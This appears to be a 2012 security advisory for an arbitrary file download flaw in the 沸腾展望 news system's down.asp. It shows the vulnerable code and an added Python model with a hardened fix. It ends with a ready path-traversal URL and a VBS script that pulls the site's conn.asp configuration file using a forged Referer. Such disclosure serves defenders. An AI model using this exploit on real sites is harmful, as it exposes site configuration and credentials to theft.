
沸腾展望 (Feiteng Zhanwang) News System Arbitrary File Download Vulnerability

2012-02-19 14:46  Views: 18148

Tags: vulnerability, 沸腾展望, news system, file download

Affected version:
沸腾展望 News System [core: 尘缘雅境] V1.1 Access edition Finish(SP3)

Description:
Vulnerable file:
down.asp

' down.asp (excerpt). GetFileName and FileUploadPath are defined elsewhere in the application (not shown here).
Const adTypeBinary = 1
FileName = Request.QueryString("FileName")
if FileName = "" Then
Response.Write "无效文件名!"
Response.End
End if
' Takes the text after the last "."; a trailing dot leaves FileExt empty, so the list below never matches it.
FileExt = Mid(FileName, InStrRev(FileName, ".") + 1)
Select Case UCase(FileExt)
Case "ASP", "ASA", "ASPX", "ASAX", "MDB"
Response.Write "非法操作!"
Response.End
End Select
Response.Clear
if lcase(right(FileName,3))="gif" or lcase(right(FileName,3))="jpg" or lcase(right(FileName,3))="png" then
Response.ContentType = "image/*" ' no download dialog for image files
else
Response.ContentType = "application/ms-download"
end if
Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName"))
Set Stream = server.CreateObject("ADODB.Stream")
Stream.Type = adTypeBinary
Stream.Open

SavePath = FileUploadPath ' directory holding uploaded files
' The user-supplied name is appended as-is: ".." and path separators are never removed.
TrueFileName = SavePath & FileName

Stream.LoadFromFile Server.MapPath(TrueFileName)
While Not Stream.EOS
Response.BinaryWrite Stream.Read(1024 * 64)
Wend
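Added example, not code from the advisory or the product: a Python model of the extension check in down.asp next to a hardened replacement. The original takes whatever follows the last dot, so a name ending in "." yields an empty extension that the blacklist never matches while Windows ignores the trailing dot when opening the file; the hardened version strips trailing dots and spaces, refuses path separators, allowlists extensions and confines the resolved path to the upload directory. The upload directory and the allowlist are assumptions.

```python
import os

# The Select Case list from down.asp, and a constructed allowlist for the fix.
BLACKLIST = {"ASP", "ASA", "ASPX", "ASAX", "MDB"}
ALLOWLIST = {"gif", "jpg", "png", "pdf", "zip"}   # assumption for this example


def vulnerable_check(filename: str) -> bool:
    """Mirror of the original logic: Mid(FileName, InStrRev(FileName, ".") + 1)
    returns whatever follows the last '.', so a trailing dot gives ''.
    Returns True when the original code would go on to stream the file."""
    if filename == "":
        return False
    ext = filename.rsplit(".", 1)[-1] if "." in filename else filename
    return ext.upper() not in BLACKLIST


def hardened_resolve(upload_dir: str, filename: str):
    """Replacement check: drop trailing dots/spaces (Windows ignores them
    when opening a file), refuse any path separator, require an allowlisted
    extension, and verify the real path is still under upload_dir.
    Returns the resolved path, or None to refuse the request."""
    name = filename.rstrip(". ")
    if not name or "/" in name or "\\" in name:
        return None
    if "." not in name:
        return None
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWLIST:
        return None
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    # Constructed inputs: the advisory's payload and an ordinary download.
    for fn in ["../conn.asp.", "conn.asp", "report.pdf"]:
        print(f"{fn!r:16} original allows: {vulnerable_check(fn)!s:5} "
              f"hardened: {hardened_resolve('/var/www/uploads', fn)}")
```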
Test method:

[Warning]

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

http://www.target.com/down.asp?FileName=../conn.asp.

(No login required; use minibrowser to forge the Referer.)
VBS version of the exploit

Dim strUrl, strData
strUrl = "http://www.target.com/down.asp?FileName=../conn.asp."
Set xPost = CreateObject("Microsoft.XMLHTTP")
With xPost
.open "Get", strUrl, False
.SetRequestHeader "Referer", strUrl ' forged Referer, as noted above
.Send()
strData = .responseBody
End with
Set sGet = CreateObject("ADODB.Stream")
With sGet
.Mode = 3
.Type = 1 ' binary
.Open()
.Write(strData)
.SaveToFile "Conn.asp",2 ' 2 = overwrite if the file exists
End with

set sGet = Nothing
set xPost = Nothing